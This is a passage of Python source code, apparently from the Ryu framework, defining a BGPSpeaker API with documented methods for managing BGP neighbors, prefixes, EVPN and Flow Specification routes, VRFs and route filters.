return self.path.nlri.prefix
else:
return None
@property
def nexthop(self):
return self.path.nexthop
@property
def label(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return getattr(self.path.nlri, 'label_list', None)
else:
return None
class BGPSpeaker(object):
def __init__(self, as_number, router_id,
bgp_server_hosts=DEFAULT_BGP_SERVER_HOSTS,
bgp_server_port=DEFAULT_BGP_SERVER_PORT,
refresh_stalepath_time=DEFAULT_REFRESH_STALEPATH_TIME,
refresh_max_eor_time=DEFAULT_REFRESH_MAX_EOR_TIME,
best_path_change_handler=None,
peer_down_handler=None,
peer_up_handler=None,
ssh_console=False,
ssh_port=None, ssh_host=None, ssh_host_key=None,
label_range=DEFAULT_LABEL_RANGE,
allow_local_as_in_count=0,
cluster_id=None,
local_pref=DEFAULT_LOCAL_PREF):
"""Create a new BGPSpeaker object with as_number and router_id to
listen on bgp_server_port.
        ``as_number`` specifies an Autonomous System Number. It must be an integer
between 1 and 65535.
``router_id`` specifies BGP router identifier. It must be the
string representation of an IPv4 address (e.g. 10.0.0.1).
        ``bgp_server_hosts`` specifies a list of TCP listen host addresses.
``bgp_server_port`` specifies TCP listen port number. 179 is
used if not specified.
``refresh_stalepath_time`` causes the BGP speaker to remove
stale routes from the BGP table after the timer expires, even
        if the speaker does not receive a Route-Refresh End-of-RIB
message. This feature is disabled (not implemented yet).
``refresh_max_eor_time`` causes the BGP speaker to generate a
Route-Refresh End-of-RIB message if it was not able to
generate one due to route flapping. This feature is disabled
(not implemented yet).
``best_path_change_handler``, if specified, is called when any
best remote path is changed due to an update message or remote
peer down. The handler is supposed to take one argument, the
        instance of the EventPrefix class.
``peer_down_handler``, if specified, is called when BGP peering
session goes down.
``peer_up_handler``, if specified, is called when BGP peering
session goes up.
        ``ssh_console`` specifies whether or not the SSH CLI needs to be started.
``ssh_port`` specifies the port number for SSH CLI server.
The default is bgp.operator.ssh.DEFAULT_SSH_PORT.
``ssh_host`` specifies the IP address for SSH CLI server.
The default is bgp.operator.ssh.DEFAULT_SSH_HOST.
``ssh_host_key`` specifies the path to the host key added to
the keys list used by SSH CLI server.
The default is bgp.operator.ssh.DEFAULT_SSH_HOST_KEY.
``label_range`` specifies the range of MPLS labels generated
automatically.
        ``allow_local_as_in_count`` specifies the maximum number of local AS number
occurrences in AS_PATH. This option is useful for e.g. auto RD/RT
configurations in leaf/spine architecture with shared AS numbers.
The default is 0 and means "local AS number is not allowed in
AS_PATH". To allow local AS, 3 is recommended (Cisco's default).
``cluster_id`` specifies the cluster identifier for Route Reflector.
It must be the string representation of an IPv4 address.
If omitted, "router_id" is used for this field.
``local_pref`` specifies the default local preference. It must be an
integer.
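        A minimal construction sketch (the AS number and router ID are
        illustrative)::
            speaker = BGPSpeaker(as_number=65001, router_id='172.17.0.1')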
"""
super(BGPSpeaker, self).__init__()
settings = {
LOCAL_AS: as_number,
ROUTER_ID: router_id,
BGP_SERVER_HOSTS: bgp_server_hosts,
BGP_SERVER_PORT: bgp_server_port,
REFRESH_STALEPATH_TIME: refresh_stalepath_time,
REFRESH_MAX_EOR_TIME: refresh_max_eor_time,
LABEL_RANGE: label_range,
ALLOW_LOCAL_AS_IN_COUNT: allow_local_as_in_count,
CLUSTER_ID: cluster_id,
LOCAL_PREF: local_pref,
}
self._core_start(settings)
self._init_signal_listeners()
self._best_path_change_handler = best_path_change_handler
self._peer_down_handler = peer_down_handler
self._peer_up_handler = peer_up_handler
if ssh_console:
            # Note: paramiko, used by bgp.operator.ssh, is an optional
            # requirement, so bgp.operator.ssh is imported lazily here.
from ryu.services.protocols.bgp.operator import ssh
ssh_settings = {
ssh.SSH_PORT: ssh_port or ssh.DEFAULT_SSH_PORT,
ssh.SSH_HOST: ssh_host or ssh.DEFAULT_SSH_HOST,
ssh.SSH_HOST_KEY: ssh_host_key or ssh.DEFAULT_SSH_HOST_KEY,
}
hub.spawn(ssh.SSH_CLI_CONTROLLER.start, **ssh_settings)
def _notify_peer_down(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_down_handler:
self._peer_down_handler(remote_ip, remote_as)
def _notify_peer_up(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_up_handler:
self._peer_up_handler(remote_ip, remote_as)
def _notify_best_path_changed(self, path, is_withdraw):
if (not path.source
or not isinstance(path, (Ipv4Path, Ipv6Path,
Vpnv4Path, Vpnv6Path, EvpnPath))):
return
ev = EventPrefix(path, is_withdraw)
if self._best_path_change_handler:
self._best_path_change_handler(ev)
def _init_signal_listeners(self):
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_BEST_PATH_CHANGED,
lambda _, info:
self._notify_best_path_changed(info['path'],
info['is_withdraw'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_DOWN,
lambda _, info:
self._notify_peer_down(info['peer'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_UP,
lambda _, info:
self._notify_peer_up(info['peer'])
)
def _core_start(self, settings):
waiter = hub.Event()
call('core.start', waiter=waiter, **settings)
waiter.wait()
def _serve_forever(self):
pass
def shutdown(self):
""" Shutdown BGP speaker
"""
call('core.stop')
def neighbor_add(self, address, remote_as,
enable_ipv4=DEFAULT_CAP_MBGP_IPV4,
enable_ipv6=DEFAULT_CAP_MBGP_IPV6,
enable_vpnv4=DEFAULT_CAP_MBGP_VPNV4,
enable_vpnv6=DEFAULT_CAP_MBGP_VPNV6,
enable_evpn=DEFAULT_CAP_MBGP_EVPN,
enable_ipv4fs=DEFAULT_CAP_MBGP_IPV4FS,
enable_ipv6fs=DEFAULT_CAP_MBGP_IPV6FS,
enable_vpnv4fs=DEFAULT_CAP_MBGP_VPNV4FS,
enable_vpnv6fs=DEFAULT_CAP_MBGP_VPNV6FS,
enable_l2vpnfs=DEFAULT_CAP_MBGP_L2VPNFS,
enable_enhanced_refresh=DEFAULT_CAP_ENHANCED_REFRESH,
enable_four_octet_as_number=DEFAULT_CAP_FOUR_OCTET_AS_NUMBER,
next_hop=None, password=None, multi_exit_disc=None,
site_of_origins=None,
is_route_server_client=DEFAULT_IS_ROUTE_SERVER_CLIENT,
is_route_reflector_client=DEFAULT_IS_ROUTE_REFLECTOR_CLIENT,
is_next_hop_self=DEFAULT_IS_NEXT_HOP_SELF,
local_address=None,
local_port=None, local_as=None,
connect_mode=DEFAULT_CONNECT_MODE,
hold_time=DEFAULT_HOLD_TIME):
""" This method registers a new neighbor. The BGP speaker tries to
        establish a BGP session with the peer (accepts a connection
from the peer and also tries to connect to it).
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address. Only IPv4 is
supported now.
``remote_as`` specifies the AS number of the peer. It must be
an integer between 1 and 65535.
``enable_ipv4`` enables IPv4 address family for this
neighbor.
``enable_ipv6`` enables IPv6 address family for this
neighbor.
``enable_vpnv4`` enables VPNv4 address family for this
neighbor.
``enable_vpnv6`` enables VPNv6 address family for this
neighbor.
``enable_evpn`` enables Ethernet VPN address family for this
neighbor.
``enable_ipv4fs`` enables IPv4 Flow Specification address family
for this neighbor.
``enable_ipv6fs`` enables IPv6 Flow Specification address family
for this neighbor.
``enable_vpnv4fs`` enables VPNv4 Flow Specification address family
for this neighbor.
``enable_vpnv6fs`` enables VPNv6 Flow Specification address family
for this neighbor.
``enable_l2vpnfs`` enables L2VPN Flow Specification address family
for this neighbor.
``enable_enhanced_refresh`` enables Enhanced Route Refresh for this
neighbor.
``enable_four_octet_as_number`` enables Four-Octet AS Number
capability for this neighbor.
``next_hop`` specifies the next hop IP address. If not
        specified, the host's IP address used to reach the peer is used.
``password`` is used for the MD5 authentication if it's
specified. By default, the MD5 authentication is disabled.
``multi_exit_disc`` specifies multi exit discriminator (MED) value
as an int type value.
If omitted, MED is not sent to the neighbor.
``site_of_origins`` specifies site_of_origin values.
This parameter must be a list of string.
``is_route_server_client`` specifies whether this neighbor is a
        route server's client or not.
``is_route_reflector_client`` specifies whether this neighbor is a
        route reflector's client or not.
``is_next_hop_self`` specifies whether the BGP speaker announces
        its own IP address as the path's next_hop to the iBGP neighbor or not.
``local_address`` specifies Loopback interface address for
iBGP peering.
``local_port`` specifies source TCP port for iBGP peering.
``local_as`` specifies local AS number per-peer.
If omitted, the AS number of BGPSpeaker instance is used.
``connect_mode`` specifies how to connect to this neighbor.
This parameter must be one of the following.
- CONNECT_MODE_ACTIVE = 'active'
- CONNECT_MODE_PASSIVE = 'passive'
- CONNECT_MODE_BOTH (default) = 'both'
``hold_time`` specifies the time after which a peer is considered
down if no update or keepalive has been received.
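        A minimal usage sketch (the peer address and AS number are
        illustrative)::
            speaker.neighbor_add(address='172.17.0.2', remote_as=65002,
                                 enable_ipv4=True)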
"""
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
neighbors.REMOTE_AS: remote_as,
PEER_NEXT_HOP: next_hop,
PASSWORD: password,
IS_ROUTE_SERVER_CLIENT: is_route_server_client,
IS_ROUTE_REFLECTOR_CLIENT: is_route_reflector_client,
IS_NEXT_HOP_SELF: is_next_hop_self,
CONNECT_MODE: connect_mode,
CAP_ENHANCED_REFRESH: enable_enhanced_refresh,
CAP_FOUR_OCTET_AS_NUMBER: enable_four_octet_as_number,
CAP_MBGP_IPV4: enable_ipv4,
CAP_MBGP_IPV6: enable_ipv6,
CAP_MBGP_VPNV4: enable_vpnv4,
CAP_MBGP_VPNV6: enable_vpnv6,
CAP_MBGP_EVPN: enable_evpn,
CAP_MBGP_IPV4FS: enable_ipv4fs,
CAP_MBGP_IPV6FS: enable_ipv6fs,
CAP_MBGP_VPNV4FS: enable_vpnv4fs,
CAP_MBGP_VPNV6FS: enable_vpnv6fs,
CAP_MBGP_L2VPNFS: enable_l2vpnfs,
HOLD_TIME: hold_time,
}
if multi_exit_disc:
bgp_neighbor[MULTI_EXIT_DISC] = multi_exit_disc
if site_of_origins:
bgp_neighbor[SITE_OF_ORIGINS] = site_of_origins
if local_address:
bgp_neighbor[LOCAL_ADDRESS] = local_address
if local_port:
bgp_neighbor[LOCAL_PORT] = local_port
if local_as:
bgp_neighbor[LOCAL_AS] = local_as
call('neighbor.create', **bgp_neighbor)
def neighbor_del(self, address):
""" This method unregister the registered neighbor. If a session with
the peer exists, the session will be closed.
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address.
"""
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('neighbor.delete', **bgp_neighbor)
def neighbor_reset(self, address):
""" This method reset the registered neighbor.
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address.
"""
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('core.reset_neighbor', **bgp_neighbor)
def neighbor_update(self, address, conf_type, conf_value):
""" This method changes the neighbor configuration.
``address`` specifies the IP address of the peer.
``conf_type`` specifies configuration type which you want to change.
Currently ryu.services.protocols.bgp.bgpspeaker.MULTI_EXIT_DISC
can be specified.
        ``conf_value`` specifies the value for the configuration type.
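        A usage sketch (the address and MED value are illustrative)::
            speaker.neighbor_update('172.17.0.2', MULTI_EXIT_DISC, 100)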
"""
assert conf_type == MULTI_EXIT_DISC or conf_type == CONNECT_MODE
func_name = 'neighbor.update'
attribute_param = {}
if conf_type == MULTI_EXIT_DISC:
attribute_param = {neighbors.MULTI_EXIT_DISC: conf_value}
elif conf_type == CONNECT_MODE:
attribute_param = {neighbors.CONNECT_MODE: conf_value}
param = {neighbors.IP_ADDRESS: address,
neighbors.CHANGES: attribute_param}
call(func_name, **param)
def neighbor_state_get(self, address=None, format='json'):
""" This method returns the state of peer(s) in a json
format.
``address`` specifies the address of a peer. If not given, the
        state of all the peers is returned.
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'params': ['neighbor', 'summary'],
'format': format,
}
if address:
show['params'].append(address)
return call('operator.show', **show)
def prefix_add(self, prefix, next_hop=None, route_dist=None):
""" This method adds a new prefix to be advertised.
``prefix`` must be the string representation of an IP network
(e.g., 10.1.1.0/24).
``next_hop`` specifies the next hop address for this
prefix. This parameter is necessary for only VPNv4 and VPNv6
address families.
``route_dist`` specifies a route distinguisher value. This
parameter is necessary for only VPNv4 and VPNv6 address
families.
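        Usage sketches for the IPv4 and VPNv4 cases (all values are
        illustrative)::
            speaker.prefix_add(prefix='10.20.0.0/24')
            speaker.prefix_add(prefix='10.30.0.0/24',
                               next_hop='10.0.0.1',
                               route_dist='65001:100')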
"""
func_name = 'network.add'
networks = {
PREFIX: prefix,
}
if next_hop:
networks[NEXT_HOP] = next_hop
if route_dist:
func_name = 'prefix.add_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
if rf == vrfs.VRF_RF_IPV6 and netaddr.valid_ipv4(next_hop):
# convert the next_hop to IPv4-Mapped IPv6 Address
networks[NEXT_HOP] = \
str(netaddr.IPAddress(next_hop).ipv6())
return call(func_name, **networks)
def prefix_del(self, prefix, route_dist=None):
""" This method deletes a advertised prefix.
``prefix`` must be the string representation of an IP network.
``route_dist`` specifies a route distinguisher value.
"""
func_name = 'network.del'
networks = {
PREFIX: prefix,
}
if route_dist:
func_name = 'prefix.delete_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
call(func_name, **networks)
def evpn_prefix_add(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None, gw_ip_addr=None, vni=None,
next_hop=None, tunnel_type=None, pmsi_tunnel_type=None,
redundancy_mode=None):
""" This method adds a new EVPN route to be advertised.
``route_type`` specifies one of the EVPN route type name.
This parameter must be one of the following.
- EVPN_ETH_AUTO_DISCOVERY = 'eth_ad'
- EVPN_MAC_IP_ADV_ROUTE = 'mac_ip_adv'
- EVPN_MULTICAST_ETAG_ROUTE = 'multicast_etag'
- EVPN_ETH_SEGMENT = 'eth_seg'
- EVPN_IP_PREFIX_ROUTE = 'ip_prefix'
``route_dist`` specifies a route distinguisher value.
        ``esi`` is a value specifying the Ethernet Segment Identifier.
0 is the default and denotes a single-homed site.
If you want to advertise esi other than 0,
it must be set as dictionary type.
If esi is dictionary type, 'type' key must be set
and specifies ESI type.
For the supported ESI type, see :py:mod:`ryu.lib.packet.bgp.EvpnEsi`.
The remaining arguments are the same as that for
the corresponding class.
``ethernet_tag_id`` specifies the Ethernet Tag ID.
``mac_addr`` specifies a MAC address to advertise.
``ip_addr`` specifies an IPv4 or IPv6 address to advertise.
``ip_prefix`` specifies an IPv4 or IPv6 prefix to advertise.
``gw_ip_addr`` specifies an IPv4 or IPv6 address of
gateway to advertise.
        ``vni`` specifies a Virtual Network Identifier for VXLAN
or Virtual Subnet Identifier for NVGRE.
If tunnel_type is not TUNNEL_TYPE_VXLAN or TUNNEL_TYPE_NVGRE,
this field is ignored.
``next_hop`` specifies the next hop address for this prefix.
``tunnel_type`` specifies the data plane encapsulation type
to advertise. By the default, this attribute is not advertised.
The supported encapsulation types are following.
- TUNNEL_TYPE_VXLAN = 'vxlan'
        - TUNNEL_TYPE_NVGRE = 'nvgre'
``pmsi_tunnel_type`` specifies the type of the PMSI tunnel attribute
used to encode the multicast tunnel identifier.
This attribute is advertised only if route_type is
EVPN_MULTICAST_ETAG_ROUTE and not advertised by the default.
This attribute can also carry vni if tunnel_type is specified.
The supported PMSI tunnel types are following.
- PMSI_TYPE_NO_TUNNEL_INFO = 0
- PMSI_TYPE_INGRESS_REP = 6
``redundancy_mode`` specifies a redundancy mode type.
This attribute is advertised only if route_type is
EVPN_ETH_AUTO_DISCOVERY and not advertised by the default.
The supported redundancy mode types are following.
- REDUNDANCY_MODE_ALL_ACTIVE = 'all_active'
- REDUNDANCY_MODE_SINGLE_ACTIVE = 'single_active'
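        A usage sketch advertising a MAC/IP Advertisement route
        (all values are illustrative)::
            speaker.evpn_prefix_add(
                route_type=EVPN_MAC_IP_ADV_ROUTE,
                route_dist='65001:100',
                esi=0,
                ethernet_tag_id=0,
                mac_addr='aa:bb:cc:dd:ee:ff',
                ip_addr='10.0.0.1',
                next_hop='172.17.0.1')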
"""
func_name = 'evpn_prefix.add_local'
# Check the default values
if not next_hop:
next_hop = '0.0.0.0'
# Set required arguments
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist,
NEXT_HOP: next_hop}
# Set optional arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[TUNNEL_TYPE] = tunnel_type
elif tunnel_type is not None:
raise ValueError('Unsupported tunnel type: %s' % tunnel_type)
# Set route type specific arguments
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
if vni is not None:
kwargs[EVPN_VNI] = vni
# Set Redundancy Mode Attribute arguments
if redundancy_mode in [
REDUNDANCY_MODE_ALL_ACTIVE,
REDUNDANCY_MODE_SINGLE_ACTIVE]:
kwargs[REDUNDANCY_MODE] = redundancy_mode
elif redundancy_mode is not None:
raise ValueError('Unsupported Redundancy Mode: %s' %
redundancy_mode)
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
# Set tunnel type specific arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
# Set tunnel type specific arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
# Set PMSI Tunnel Attribute arguments
if pmsi_tunnel_type in [
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP]:
kwargs[PMSI_TUNNEL_TYPE] = pmsi_tunnel_type
elif pmsi_tunnel_type is not None:
raise ValueError('Unsupported PMSI tunnel type: %s' %
pmsi_tunnel_type)
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
GW_IP_ADDR: gw_ip_addr,
})
# Set tunnel type specific arguments
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def evpn_prefix_del(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None):
""" This method deletes an advertised EVPN route.
``route_type`` specifies one of the EVPN route type name.
``route_dist`` specifies a route distinguisher value.
        ``esi`` is a value specifying the Ethernet Segment Identifier.
``ethernet_tag_id`` specifies the Ethernet Tag ID.
``mac_addr`` specifies a MAC address to advertise.
``ip_addr`` specifies an IPv4 or IPv6 address to advertise.
``ip_prefix`` specifies an IPv4 or IPv6 prefix to advertise.
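        A usage sketch withdrawing a MAC/IP Advertisement route
        (all values are illustrative)::
            speaker.evpn_prefix_del(
                route_type=EVPN_MAC_IP_ADV_ROUTE,
                route_dist='65001:100',
                ethernet_tag_id=0,
                mac_addr='aa:bb:cc:dd:ee:ff',
                ip_addr='10.0.0.1')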
"""
func_name = 'evpn_prefix.delete_local'
# Set required arguments
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist}
# Set route type specific arguments
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
})
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def flowspec_prefix_add(self, flowspec_family, rules, route_dist=None,
actions=None):
""" This method adds a new Flow Specification prefix to be advertised.
``flowspec_family`` specifies one of the flowspec family name.
This parameter must be one of the following.
- FLOWSPEC_FAMILY_IPV4 = 'ipv4fs'
- FLOWSPEC_FAMILY_IPV6 = 'ipv6fs'
- FLOWSPEC_FAMILY_VPNV4 = 'vpnv4fs'
- FLOWSPEC_FAMILY_VPNV6 = 'vpnv6fs'
- FLOWSPEC_FAMILY_L2VPN = 'l2vpnfs'
``rules`` specifies NLRIs of Flow Specification as
a dictionary type value.
For the supported NLRI types and arguments,
see `from_user()` method of the following classes.
- :py:mod:`ryu.lib.packet.bgp.FlowSpecIPv4NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecIPv6NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecVPNv4NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecVPNv6NLRI`
- :py:mod:`ryu.lib.packet.bgp.FlowSpecL2VPNNLRI`
``route_dist`` specifies a route distinguisher value.
This parameter is required only if flowspec_family is one of the
following address family.
- FLOWSPEC_FAMILY_VPNV4 = 'vpnv4fs'
- FLOWSPEC_FAMILY_VPNV6 = 'vpnv6fs'
- FLOWSPEC_FAMILY_L2VPN = 'l2vpnfs'
``actions`` specifies Traffic Filtering Actions of
Flow Specification as a dictionary type value.
The keys are "ACTION_NAME" for each action class and
values are used for the arguments to that class.
For the supported "ACTION_NAME" and arguments,
see the following table.
=============== ===============================================================
ACTION_NAME Action Class
=============== ===============================================================
traffic_rate :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTrafficRateCommunity`
traffic_action :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTrafficActionCommunity`
redirect :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecRedirectCommunity`
traffic_marking :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTrafficMarkingCommunity`
vlan_action :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecVlanActionCommunity`
tpid_action :py:mod:`ryu.lib.packet.bgp.BGPFlowSpecTPIDActionCommunity`
=============== ===============================================================
Example(IPv4)::
>>> speaker = BGPSpeaker(as_number=65001, router_id='172.17.0.1')
>>> speaker.neighbor_add(address='172.17.0.2',
... remote_as=65002,
... enable_ipv4fs=True)
>>> speaker.flowspec_prefix_add(
... flowspec_family=FLOWSPEC_FAMILY_IPV4,
... rules={
... 'dst_prefix': '10.60.1.0/24'
... },
... actions={
... 'traffic_marking': {
... 'dscp': 24
... }
... }
... )
Example(VPNv4)::
>>> speaker = BGPSpeaker(as_number=65001, router_id='172.17.0.1')
>>> speaker.neighbor_add(address='172.17.0.2',
... remote_as=65002,
... enable_vpnv4fs=True)
>>> speaker.vrf_add(route_dist='65001:100',
... import_rts=['65001:100'],
... export_rts=['65001:100'],
... route_family=RF_VPNV4_FLOWSPEC)
>>> speaker.flowspec_prefix_add(
... flowspec_family=FLOWSPEC_FAMILY_VPNV4,
... route_dist='65000:100',
... rules={
... 'dst_prefix': '10.60.1.0/24'
... },
... actions={
... 'traffic_marking': {
... 'dscp': 24
... }
... }
... )
"""
func_name = 'flowspec.add'
# Set required arguments
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
FLOWSPEC_ACTIONS: actions or {},
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.add_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def flowspec_prefix_del(self, flowspec_family, rules, route_dist=None):
""" This method deletes an advertised Flow Specification route.
``flowspec_family`` specifies one of the flowspec family name.
``rules`` specifies NLRIs of Flow Specification as
a dictionary type value.
``route_dist`` specifies a route distinguisher value.
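        A usage sketch withdrawing an IPv4 Flow Specification route
        (the rule is illustrative)::
            speaker.flowspec_prefix_del(
                flowspec_family=FLOWSPEC_FAMILY_IPV4,
                rules={'dst_prefix': '10.60.1.0/24'})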
"""
func_name = 'flowspec.del'
# Set required arguments
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.del_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def vrf_add(self, route_dist, import_rts, export_rts, site_of_origins=None,
route_family=RF_VPN_V4, multi_exit_disc=None):
""" This method adds a new vrf used for VPN.
``route_dist`` specifies a route distinguisher value.
``import_rts`` specifies a list of route targets to be imported.
``export_rts`` specifies a list of route targets to be exported.
``site_of_origins`` specifies site_of_origin values.
This parameter must be a list of string.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 (default) = 'ipv4'
- RF_VPN_V6 = 'ipv6'
- RF_L2_EVPN = 'evpn'
- RF_VPNV4_FLOWSPEC = 'ipv4fs'
- RF_VPNV6_FLOWSPEC = 'ipv6fs'
- RF_L2VPN_FLOWSPEC = 'l2vpnfs'
``multi_exit_disc`` specifies multi exit discriminator (MED) value.
It must be an integer.
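        A usage sketch (the route distinguisher and route targets are
        illustrative)::
            speaker.vrf_add(route_dist='65001:100',
                            import_rts=['65001:100'],
                            export_rts=['65001:100'])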
"""
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
vrf = {
vrfs.ROUTE_DISTINGUISHER: route_dist,
vrfs.IMPORT_RTS: import_rts,
vrfs.EXPORT_RTS: export_rts,
vrfs.SITE_OF_ORIGINS: site_of_origins,
vrfs.VRF_RF: route_family,
vrfs.MULTI_EXIT_DISC: multi_exit_disc,
}
call('vrf.create', **vrf)
def vrf_del(self, route_dist):
""" This method deletes the existing vrf.
``route_dist`` specifies a route distinguisher value.
"""
vrf = {vrfs.ROUTE_DISTINGUISHER: route_dist}
call('vrf.delete', **vrf)
def vrfs_get(self, subcommand='routes', route_dist=None,
route_family='all', format='json'):
""" This method returns the existing vrfs.
``subcommand`` specifies one of the following.
- 'routes': shows routes present for vrf
- 'summary': shows configuration and summary of vrf
``route_dist`` specifies a route distinguisher value.
If route_family is not 'all', this value must be specified.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 = 'ipv4'
- RF_VPN_V6 = 'ipv6'
- RF_L2_EVPN = 'evpn'
- 'all' (default)
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'format': format,
}
if route_family in SUPPORTED_VRF_RF:
assert route_dist is not None
show['params'] = ['vrf', subcommand, route_dist, route_family]
else:
show['params'] = ['vrf', subcommand, 'all']
return call('operator.show', **show)
def rib_get(self, family='all', format='json'):
""" This method returns the BGP routing information in a json
format. This will be improved soon.
``family`` specifies the address family of the RIB (e.g. 'ipv4').
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'params': ['rib', family],
'format': format
}
return call('operator.show', **show)
def neighbor_get(self, route_type, address, format='json'):
""" This method returns the BGP adj-RIB-in/adj-RIB-out information
in a json format.
        ``route_type`` specifies the type of routes to return.
        This parameter must be one of the following.
- received-routes : paths received and not withdrawn by given peer
- sent-routes : paths sent and not withdrawn to given peer
``address`` specifies the IP address of the peer. It must be
the string representation of an IP address.
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'format': format,
}
if route_type == 'sent-routes' or route_type == 'received-routes':
show['params'] = ['neighbor', route_type, address, 'all']
else:
show['params'] = ['neighbor', 'received-routes', address, 'all']
return call('operator.show', **show)
def neighbors_get(self, format='json'):
""" This method returns a list of the BGP neighbors.
``format`` specifies the format of the response.
This parameter must be one of the following.
- 'json' (default)
- 'cli'
"""
show = {
'params': ['neighbor'],
'format': format,
}
return call('operator.show', **show)
def _set_filter(self, filter_type, address, filters):
        assert filter_type in ('in', 'out'), (
            "filter type must be 'in' or 'out'")
        # normalize None to an empty list before validating the items
        if filters is None:
            filters = []
        assert all(isinstance(f, Filter) for f in filters), (
            'all the items in filters must be instances of Filter sub-classes')
func_name = 'neighbor.' + filter_type + '_filter.set'
param = {
neighbors.IP_ADDRESS: address,
}
if filter_type == 'in':
param[neighbors.IN_FILTER] = filters
else:
param[neighbors.OUT_FILTER] = filters
call(func_name, **param)
def out_filter_set(self, address, filters):
""" This method sets out-filter to neighbor.
``address`` specifies the IP address of the peer.
``filters`` specifies a filter list to filter the path advertisement.
        The contents must be instances of Filter sub-classes.
        If you want to define an out-filter that sends only a particular
        prefix to a neighbor, filters can be created as follows::
p = PrefixFilter('10.5.111.0/24',
policy=PrefixFilter.POLICY_PERMIT)
